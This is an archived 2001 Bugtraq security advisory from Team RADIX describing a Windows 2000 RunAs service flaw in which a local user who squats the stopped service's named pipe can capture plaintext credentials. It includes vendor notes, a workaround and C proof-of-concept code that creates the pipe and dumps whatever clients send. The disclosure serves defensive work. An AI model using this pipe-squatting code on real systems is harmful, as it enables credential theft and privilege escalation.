Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

RADIX1112200101

From: research () camisade com
Date: Mon, 12 Nov 2001 22:30:25 +0100
Team RADIX Research Report: RADIX1112200101

Date Published: 11-12-2001 
Research Report ID: RADIX1112200101 
Bugtraq ID: 3185 
CVE CAN: N/A 
Title: RunAs Service Pipe Authentication Failure 
Class: Privilege Escalation and Information Disclosure 
Remotely Exploitable: No 
Locally Exploitable: Yes 

Vulnerability Description: 
The Windows 2000 RunAs service allows a user to launch an application in a security context based upon a supplied set 
of credentials. If the service is ever in a stopped state, an arbitrary local user of the system has the ability to 
recover the RunAs service user's plaintext credentials. Additionally, the user may also impersonate the credentials the 
clients of the RunAs service. 

Vulnerable Systems: Microsoft Windows 2000 

Solution/Vendor Information/Workaround: 
The vendor has decided to include the fix within service pack 3 (SP3). 

According to the vendor, "In February 2002, we will release Windows 2000 Service Pack 3 (SP3)". 

http://www.microsoft.com/presspass/features/2001/oct01/10-03securityqa.asp 

When service pack 3 is released, Camisade recommends installing it. 

In the meantime, do not use the RunAs service. However, do not disable the RunAs service. The RADIX1112200101 
vulnerability can only be exploited if the RunAs service is not running. The malicious attacker is performing a man in 
the middle attack using a malicious RunAs service. 

Summary: Ensure the RunAs service is in it's default setting (automatically started and running). The default install 
of the service, unused and not set to manual (or disabled) is the safest method until service pack 3 is released. As a 
temporary solution, do not use any utilities that leverage the RunAs service. This includes the RunAs command line 
utility and Explorer's RunAs functionality. 

Vendor notified on: 09-10-2001 

The vendor was notified, and confirmed receipt, approximately two months ago. In keeping with the Camisade Research 
Report Policy, the information has been made public to best benefit the security community through full disclosure. 

Credits: 
Camisade - Team RADIX (research () camisade com) http://www.camisade.com 

This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or 
assistance drafting advisories please mail vulnhelp () securityfocus com. 

Technical Description - Proof of Concept Code: 
The Windows 2000 API CreateProcessWithLogonW leverages the RunAs service to authenticate and launch an application 
requested by the user, in a distinct security context, based on the credentials supplied. Consequently, that API must 
send highly sensitive data to the RunAs service in order to launch that application. However, that API performs no 
server-side authenticity validation prior to sending the credentials. 

If the RunAs service is ever in a stopped state, an arbitrary user may usurp its named pipe communication channel 
"\\.\pipe\secondarylogon". The user's malicious application would then be capable of stealing credentials of the users 
of the RunAs service, because the credentials are sent in plaintext. Additionally, the application is capable of 
impersonating the clients' security context throughout the system in an effort to escalate privileges. 

In light of issues such as these, Microsoft created the native API NtSecureConnectPort for sending highly sensitive 
data via the LPC subsystem. Unfortunately, there is no standard API, provided by Microsoft, for deterministically 
connecting to a pipe based on a supplied SID. 


// radix1112200101.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.

#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>
#include <stdio.h>

#define MAX_IN_BUF   0x1000
#define MAX_OUT_BUF  0x4
#define MAX_INST     0xA

#define SECONDARY_LOGON_PIPE  _T("\\\\.\\pipe\\SecondaryLogon")


void main()
{
   HANDLE hPipe;

   hPipe = CreateNamedPipe(SECONDARY_LOGON_PIPE, PIPE_ACCESS_DUPLEX, 
      PIPE_TYPE_BYTE|PIPE_WAIT, MAX_INST, MAX_OUT_BUF, MAX_IN_BUF, 
      NMPWAIT_USE_DEFAULT_WAIT, 0);

   if (hPipe == INVALID_HANDLE_VALUE)
   {
      printf("Can't create secondary logon pipe.  Error %d\n", GetLastError());
      return;
   }

   printf("Created pipe and waiting for clients...\n");
   if (ConnectNamedPipe(hPipe, 0))
   {
      UCHAR InBuf[MAX_IN_BUF];
      DWORD dwReadCount;
      
      while (ReadFile(hPipe, InBuf, MAX_IN_BUF, &dwReadCount, 0))
      {
         printf("Read %d bytes.  (ASCII Dump)\n", dwReadCount);

         DWORD dwPos;
         for (dwPos = 0; dwPos < dwReadCount; dwPos++)
         {
            printf("%c ", InBuf[dwPos]);

            if ((dwPos % 16) == 0)
               printf("\n");
         }

         DWORD dwReply = ERROR_ACCESS_DENIED;
         DWORD dwWroteCount;
         WriteFile(hPipe, &dwReply, sizeof(DWORD), &dwWroteCount, 0);
      }
   }
   DisconnectNamedPipe(hPipe);
   CloseHandle(hPipe);
}


-- 
Team RADIX -- Camisade LLC
http://www.camisade.com
Application Security Innovations
Camisade Direct: 1.800.709.1241
Previous By Date Next
Previous By Thread Next

Current thread: